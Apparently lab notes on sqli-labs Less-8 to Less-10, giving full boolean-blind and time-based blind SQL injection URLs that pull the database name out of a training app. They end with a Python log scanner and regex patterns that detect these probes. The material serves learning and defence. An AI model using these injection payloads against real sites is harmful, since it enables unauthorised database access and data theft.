select if()
select database()
substr((select database()),1,1)
ascii(substr((select database()),1,1))
select if(ascii(substr((select database()),1,1)) > 10, 2,3);
Less-8
The first method: boolean blind
With a single quote appended, the echo disappears.
Adding a comment after the quote makes the echo come back, which indicates an injection vulnerability.
Guessing the database name
Method one
The first character is guessed to be s
http://192.168.50.100/sqli/Less-8/?id=1'
and left((select database()),1)=0x73--+
Method two
Or use
http://192.168.50.100/sqli/Less-8/?id=1'
and ascii(substr((select database()),1,1)) > 16--+
The second method: time-based blind
http://192.168.50.100/sqli/Less-8/?id=1' and
if(length(database()) = 8,1,sleep(5))--+
- When the value is 8 the page loads quickly; for any other value it loads slowly (about 5 s). This shows that the database name length is 8 (security).
When I guessed 18 the page loaded with no echo.
Then determine the ASCII code of the first character:
http://192.168.50.100/sqli/Less-8/
?id=1' and
if(ascii(substr((select database()),1,1)) =119, 1,sleep(5)) --+;
Wrong guess: no return value and the page loads slowly.
Correct guess: the value is returned and the page loads quickly.
http://192.168.50.100/sqli/Less-8/?id=1' and
if(ascii(substr((select database()),1,1)) =115, 1,sleep(5)) --+;
Then, in the same way with time-based blind injection, work out the table, column and field information.
Less-9
http://192.168.50.100/sqli/Less-9/?id=1' and sleep(5) --+
Sleeps for 5 seconds: the response is slow and the echo is correct, which shows that an injection vulnerability exists.
- 1. http://127.0.0.1/sqli/Less-9/?id=1' order by 3999--+ When using order by, the echo is always "you are in…" no matter what, so order by cannot be used to make the judgement.
- 2. http://127.0.0.1/sqli/Less-9/?id=1' and sleep(5)--+ When an injection vulnerability exists, delay-based injection can be used to judge it: if the vulnerability exists, the result only comes back after sleeping for 5 s.
- 3. http://127.0.0.1/sqli/Less-9/?id=1' and if(length(database())=8,1,sleep(5)); Judge by the response time: if the database name length is 8, the response comes back quickly.
- 4. http://127.0.0.1/sqli/Less-9/?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 4,1),1,1))>1112,1,sleep(5))--+ Use the same method as in Less-8 to make the judgement.
- 5. Because blind injection is guesswork, it is recommended to use a script.
Less-10
- 1. http://192.168.50.100/sqli/Less-10/?id=1" and sleep(11)--+ Only the single quote from Less-9 is replaced with a double quote; everything else is the same.
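The boolean and time-based probes used in Less-8, Less-9 and Less-10 all leave a recognisable signature in the web server's access log: a quote that breaks out of the `id` value, `sleep()`/`if()`/`ascii(substr())` calls and a trailing `--+` comment. As an added example (not part of the original notes or of sqli-labs), the script below decodes the query string of each request and flags lines that match two or more of these indicators. The log format and the indicator names are assumptions; the log lines are constructed to mirror the URLs above.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines modelled on the Less-8/9/10
# requests discussed in the notes (not real traffic).
SAMPLE_LOG = """\
192.168.50.1 - - [10/Oct/2023:12:00:01 +0000] "GET /sqli/Less-8/?id=1 HTTP/1.1" 200 1234
192.168.50.1 - - [10/Oct/2023:12:00:02 +0000] "GET /sqli/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),1,1))%20%3E%2016--+ HTTP/1.1" 200 1234
192.168.50.1 - - [10/Oct/2023:12:00:09 +0000] "GET /sqli/Less-9/?id=1%27%20and%20if(length(database())=8,1,sleep(5))--+ HTTP/1.1" 200 1234
192.168.50.1 - - [10/Oct/2023:12:00:10 +0000] "GET /sqli/Less-10/?id=1%22%20and%20sleep(11)--+ HTTP/1.1" 200 1234
192.168.50.1 - - [10/Oct/2023:12:00:11 +0000] "GET /sqli/Less-8/?id=42 HTTP/1.1" 200 1234
"""

# Indicator names are our own choice; each regex matches one trait of the probes above.
INDICATORS = {
    "quote_breakout": re.compile(r"""['"]\s*(and|or)\b""", re.I),          # 1' and ... / 1" and ...
    "time_based":     re.compile(r"\b(sleep|benchmark)\s*\(", re.I),       # sleep(5), sleep(11)
    "boolean_probe":  re.compile(r"\b(ascii|substr|substring|left|length)\s*\(", re.I),
    "schema_lookup":  re.compile(r"\b(database\s*\(|information_schema)", re.I),
    "comment_tail":   re.compile(r"(--\s|--\+|#|/\*)"),                    # --+ / -- / #
}

REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify_query(raw_query: str) -> set[str]:
    """Return the names of all indicators matched by one URL query string."""
    decoded = unquote_plus(raw_query)   # %27 -> ', %20 -> space, + -> space
    return {name for name, rx in INDICATORS.items() if rx.search(decoded)}


def scan_log(log_text: str, min_indicators: int = 2) -> list[tuple[str, set[str]]]:
    """Return (path, indicators) for requests matching at least min_indicators patterns."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group(1):
            continue                      # no query string, nothing to inspect
        path, query = m.group(1).split("?", 1)
        tags = classify_query(query)
        if len(tags) >= min_indicators:   # one match alone is too noisy to alert on
            hits.append((path, tags))
    return hits


if __name__ == "__main__":
    for path, tags in scan_log(SAMPLE_LOG):
        print(path, sorted(tags))
```

Requiring two indicators keeps a lone `#` or `length(` in a legitimate parameter from alerting, while every probe above still matches three or more.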